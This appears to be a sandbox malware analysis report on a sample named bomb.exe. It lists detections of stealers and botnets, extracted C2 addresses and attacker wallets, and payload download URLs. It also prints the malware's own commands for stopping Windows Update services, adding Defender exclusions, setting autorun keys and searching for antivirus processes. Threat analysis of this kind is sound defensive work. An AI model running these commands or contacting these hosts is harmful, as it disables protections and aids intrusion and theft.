48.2.sysvplervcs.exe.400000.0.unpack	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
40.2.RegSvcs.exe.400000.0.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
23.0.323057790.exe.400000.0.unpack	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
15.0.sysvplervcs.exe.400000.0.unpack	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
8.2.MSBuild.exe.43dcd8.0.raw.unpack	HiddenCobra_BANKSHOT_Gen	Detects Hidden Cobra BANKSHOT trojan	Florian Roth	0x201d7:$x5: vchost.exe 0x211d7:$x5: vchost.exe
49.2.httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe.32a0000.1.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
19.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
8.2.MSBuild.exe.43f8e0.1.raw.unpack	HiddenCobra_BANKSHOT_Gen	Detects Hidden Cobra BANKSHOT trojan	Florian Roth	0x1e5cf:$x5: vchost.exe 0x1f5cf:$x5: vchost.exe
4.2.http185.215.113.66newtpp.exe.exe.400000.0.unpack	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
15.2.sysvplervcs.exe.400000.0.unpack	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
4.0.http185.215.113.66newtpp.exe.exe.400000.0.unpack	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
5.2.httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe.ee0000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
5.2.httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe.ee0000.0.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
8.2.MSBuild.exe.400000.2.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
8.2.MSBuild.exe.400000.2.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
8.2.MSBuild.exe.400000.2.raw.unpack	HiddenCobra_BANKSHOT_Gen	Detects Hidden Cobra BANKSHOT trojan	Florian Roth	0x5deaf:$x5: vchost.exe 0x5eeaf:$x5: vchost.exe
8.2.MSBuild.exe.400000.2.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
8.2.MSBuild.exe.400000.2.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
41.0.sysvplervcs.exe.400000.0.unpack	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
48.0.sysvplervcs.exe.400000.0.unpack	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
19.2.RegAsm.exe.400000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
17.2.httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe.38b5570.0.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
40.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
49.2.httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe.32a0000.1.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
8.2.MSBuild.exe.43f8e0.1.unpack	HiddenCobra_BANKSHOT_Gen	Detects Hidden Cobra BANKSHOT trojan	Florian Roth	0x1c1cf:$x5: vchost.exe
26.2.sysvplervcs.exe.400000.0.unpack	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
5.2.httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe.f08ae0.2.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
5.2.httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe.f08ae0.2.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
49.2.httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe.3250000.2.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
17.2.httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe.38b5570.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
49.2.httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe.3250000.2.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
5.2.httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe.f08ae0.2.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
5.2.httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe.f08ae0.2.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
6.2.http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe.3749970.0.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 32 entries

Sigma Signatures

Operating System Destruction

Sigma detected: Stop multiple services

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait, CommandLine: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\sysvplervcs.exe, ParentImage: C:\Users\user\sysvplervcs.exe, ParentProcessId: 7872, ParentProcessName: sysvplervcs.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait, ProcessId: 8104, ProcessName: cmd.exe

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", CommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\sysvplervcs.exe, ParentImage: C:\Users\user\sysvplervcs.exe, ParentProcessId: 7872, ParentProcessName: sysvplervcs.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", ProcessId: 8088, ProcessName: cmd.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\sysvplervcs.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\323057790.exe, ProcessId: 7664, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Settings

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: Batch.pif O, CommandLine: Batch.pif O, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\400445\Batch.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\400445\Batch.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\400445\Batch.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Tits Tits.bat & Tits.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7276, ParentProcessName: cmd.exe, ProcessCommandLine: Batch.pif O, ProcessId: 8020, ProcessName: Batch.pif

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\sysvplervcs.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe, ProcessId: 5660, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", CommandLine: powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8088, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", ProcessId: 8164, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 2472, ProcessName: svchost.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Tits Tits.bat & Tits.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7276, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 7896, ProcessName: findstr.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: bomb.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://steamcommunity.com/profiles/76561199780418869	URL Reputation: Label: malware
Source: stamppreewntnq.shop	URL Reputation: Label: phishing

Antivirus detection for dropped file

Source: C:\ProgramData\GHJDBAKEHD.exe	Avira: detection malicious, Label: HEUR/AGEN.1310458
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\newtpp[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1360619
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\a43486128347[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1310458

Found malware configuration

Source: 00000028.00000002.4200675181.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "45.202.35.101/pLQvfD4d/index.php", "Version": "4.42", "Install Folder": "9d94d7e7d6", "Install File": "Hkbsse.exe"}
Source: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "b99f23e6ab2693b305f8810abd671d18"}
Source: 41.2.sysvplervcs.exe.400000.0.unpack	Malware Configuration Extractor: Phorpiex {"C2 url": ["http://185.215.113.66/", "http://91.202.233.141/"], "Wallet": ["15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC", "1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK", "lskaj7asu8rwp4p9kpdqebnqh6kzyuefzqjszyd5w", "ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp", "zil19delrukejtr306u0s7ludxrwk434jcl6ghpng3", "zncBgwqwqquPLHrM4ozrtr3LPyFuNVemy4v", "cro1xq0gkfldclds7y7fa2x6x25zu7ttnxxkjs66gf", "erd1hwcnscv0tldljl68upajgfqrcrmtznth4n6ee46le43cqpe5tatqw96dnx", "kava1r9xek0h0vkfra44lg3rp07teh9elxg2n6vsdzn", "inj1e2g9nyfjcnvgjpaa3czx2spgf2jx3gp4gk0nl9", "osmo125f3mw4xd9htpsq4zj5w5ezm5gags37y6pnhx3", "one1mnk7lk2506r0ewvr7zgwfuyt7ahvngwqedka3x", "3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc", "3ESHude8zUHksQg1h6hHmzY79BS36L91Yn", "DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA", "DsWwjQcpgo8AoFYvFnLrwFpcx8wgjSYLexe", "t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh", "terra1mw3dhwak2qe46drv4g7lvgwn79fzm8nr0htdq5", "thor1tdexg3v738xg9n289d6586frflkkcxxdgtauur", "tz1ZUNuZkWjdTt597axUcyZ5kFRtUZmUKuG2", "stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj", "stride125f3mw4xd9htpsq4zj5w5ezm5gags37y33qmy0", "sei125f3mw4xd9htpsq4zj5w5ezm5gags37ylk33kz", "sys1q0zg3clqajs04p2yhkgf96nf4hmup9mdr8l38u6", "bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2", "bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr", "bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd", "btg1qwg85kf0r3885a82wtld053fy490lm2q2gemgpy", "ronin:a77fa3ea6e09a5f3fbfcb2a42fe21b5cf0ecdd17", "bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r", "cosmos125f3mw4xd9htpsq4zj5w5ezm5gags37yj6q8sr", "addr1qxlwyj95fk9exqf55tdknx49e5443nr925tajatrdqpp8djla7u9jhswc3dk39se79f9zhwwq2ca95er3mylm48wyalqr62dmg", "nano_3p8stz4wqicgda1g3ifd48girzd5u74is8sdqq99tkuuz1b96wjwbc7yrmnb", "GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3", "Gcrx8cK7ffKLaPJwiYHQrgi6pFTLbJsBPV", "EQxXrZv7VQpoAA15kJ1XJyXVxT3yQSoNyM", "B62qpDfv86fUZc4ntrYJL6eFJZajjNKRcBuW5iPbcLNkiPekLkV8NdA", "BKyTYg4eZC9NCzcL8M3hcUmDhCnBJrSScH", "UQAbBKbfkiK3Gjo86zgD3yYO5Njf7zxPTEO4JLqN13ruoGDb"]}
Source: 49.2.httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe.32a0000.1.raw.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["traineiwnqo.shop", "evoliutwoqm.shop", "awwardwiqi.shop", "caffegclasiqwp.shop", "stamppreewntnq.shop", "millyscroqwp.shop", "stagedchheiqwo.shop", "locatedblsoqp.shop", "condedqpwqm.shop"], "Build id": "E6UHNR--"}
Source: 19.2.RegAsm.exe.400000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://45.152.113.10/92335b4816f77e90.php", "Botnet": "cry"}

Multi AV Scanner detection for domain / URL

Source: http://94.156.66.26/i686	Virustotal: Detection: 8%	Perma Link
Source: http://91.92.253.151/ISIS.sh	Virustotal: Detection: 5%	Perma Link
Source: http://94.156.66.26/sh4	Virustotal: Detection: 8%	Perma Link
Source: http://182.127.113.67:39674/Mozi.m	Virustotal: Detection: 10%	Perma Link
Source: http://222.142.72.194:45127/bin.sh	Virustotal: Detection: 12%	Perma Link
Source: http://117.235.73.178:32784/bin.sh	Virustotal: Detection: 7%	Perma Link
Source: http://117.235.124.41:34700/i	Virustotal: Detection: 9%	Perma Link
Source: http://115.62.159.148:54296/bin.sh	Virustotal: Detection: 6%	Perma Link
Source: http://94.156.66.26/go.sh	Virustotal: Detection: 7%	Perma Link
Source: http://117.208.29.24:35004/Mozi.m	Virustotal: Detection: 6%	Perma Link
Source: http://222.137.17.110:54555/Mozi.m	Virustotal: Detection: 12%	Perma Link
Source: http://91.92.253.151/a-r.m-7.ISIS	Virustotal: Detection: 5%	Perma Link
Source: http://114.218.89.83:57737/i	Virustotal: Detection: 10%	Perma Link
Source: http://59.99.142.205:48152/i	Virustotal: Detection: 5%	Perma Link
Source: http://117.210.182.106:46567/Mozi.m	Virustotal: Detection: 7%	Perma Link
Source: http://94.156.66.26/mips	Virustotal: Detection: 15%	Perma Link
Source: http://59.91.86.216:58581/i	Virustotal: Detection: 8%	Perma Link
Source: http://59.184.252.30:39594/bin.sh	Virustotal: Detection: 7%	Perma Link
Source: http://222.139.78.17:42446/i	Virustotal: Detection: 7%	Perma Link
Source: http://117.255.96.106:35990/i	Virustotal: Detection: 5%	Perma Link
Source: http://94.156.66.26/i586	Virustotal: Detection: 8%	Perma Link
Source: http://61.3.151.106:41663/bin.sh	Virustotal: Detection: 7%	Perma Link
Source: http://59.93.227.73:55045/bin.sh	Virustotal: Detection: 6%	Perma Link
Source: http://182.119.181.181:39311/bin.sh	Virustotal: Detection: 15%	Perma Link
Source: http://117.248.170.35:43845/bin.sh	Virustotal: Detection: 13%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\1037419404.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\1534331641.exe	ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Temp\454830019.exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\Desktop\http185.215.113.66pei.exe.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	ReversingLabs: Detection: 13%
Source: C:\Users\user\Desktop\httpjask.powerforxes.shoplopsa66d5ca151a052_stealcuniq.exe.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\Desktop\httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\Desktop\httpjask.powerforxes.shoprevada66af9bdbf0f60_team.exe.exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\Desktop\httpjask.powerforxes.shoprevada66eb0d09c9f08_Gads.exe.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopyuop66b4f6893d3c3_shapr3D.exe.exe	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopyuop66f13c8ec4580_uninstaller.exe.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopyuop66f6b9bd7a566_784865439765.exe#ss.exe	ReversingLabs: Detection: 60%
Source: C:\Users\user\Desktop\httpmales.mugutu.comlopsa66dc99a997229_VirtualLibrary.exe.exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\Desktop\httpmales.mugutu.comprog66c2d861a5b4d_google.exe.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66e06cea88f93_bluesapphire.exe.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\Desktop\httpmales.mugutu.comyuop66bf353c38733_Grids.exe.exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\Desktop\httpmales.mugutu.comyuop66cf535e3dcf9_BitcoinCore.exe.exe	ReversingLabs: Detection: 60%
Source: C:\Users\user\Desktop\httpmales.mugutu.comyuop66d32ff81a663_lump.exe.exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\Desktop\httpmales.mugutu.comyuop66d5edf357fbf_BitcoinCore.exe.exe	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\httpmales.mugutu.comyuop66e096a0354a7_Burn.exe.exe	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\httpmales.mugutu.comyuop66ebf725efe38_lyla.exe.exe	ReversingLabs: Detection: 83%

Multi AV Scanner detection for submitted file

Source: bomb.exe	ReversingLabs: Detection: 65%
Source: bomb.exe	Virustotal: Detection: 78%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.7% probability

Machine Learning detection for dropped file

Source: C:\ProgramData\GHJDBAKEHD.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1037419404.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\newtpp[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\a43486128347[1].exe	Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000031.00000002.3020983924.00000000032A0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: caffegclasiqwp.shop
Source: 00000031.00000002.3020983924.00000000032A0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: stamppreewntnq.shop
Source: 00000031.00000002.3020983924.00000000032A0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: stagedchheiqwo.shop
Source: 00000031.00000002.3020983924.00000000032A0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: millyscroqwp.shop
Source: 00000031.00000002.3020983924.00000000032A0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: evoliutwoqm.shop
Source: 00000031.00000002.3020983924.00000000032A0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: condedqpwqm.shop
Source: 00000031.00000002.3020983924.00000000032A0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: traineiwnqo.shop
Source: 00000031.00000002.3020983924.00000000032A0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: locatedblsoqp.shop
Source: 00000031.00000002.3020983924.00000000032A0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: awwardwiqi.shop
Source: 00000031.00000002.3020983924.00000000032A0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000031.00000002.3020983924.00000000032A0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000031.00000002.3020983924.00000000032A0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000031.00000002.3020983924.00000000032A0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000031.00000002.3020983924.00000000032A0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000031.00000002.3020983924.00000000032A0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: E6UHNR--

Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	Code function: 4_2_0040C830 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,	4_2_0040C830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree,	8_2_004080A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_00411E5D CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	8_2_00411E5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	8_2_00408048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0040A7D8 _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA,	8_2_0040A7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C5A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	8_2_67C5A730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C1E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	8_2_67C1E6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C3A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	8_2_67C3A650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C18670 PK11_ExportEncryptedPrivKeyInfo,	8_2_67C18670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C825B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	8_2_67C825B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C344C0 PK11_PubEncrypt,	8_2_67C344C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C34440 PK11_PrivDecrypt,	8_2_67C34440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C04420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	8_2_67C04420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C343B0 PK11_PubEncryptPKCS1,PR_SetError,	8_2_67C343B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C60180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	8_2_67C60180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C3A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	8_2_67C3A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67C33560 PK11_Decrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	8_2_67C33560

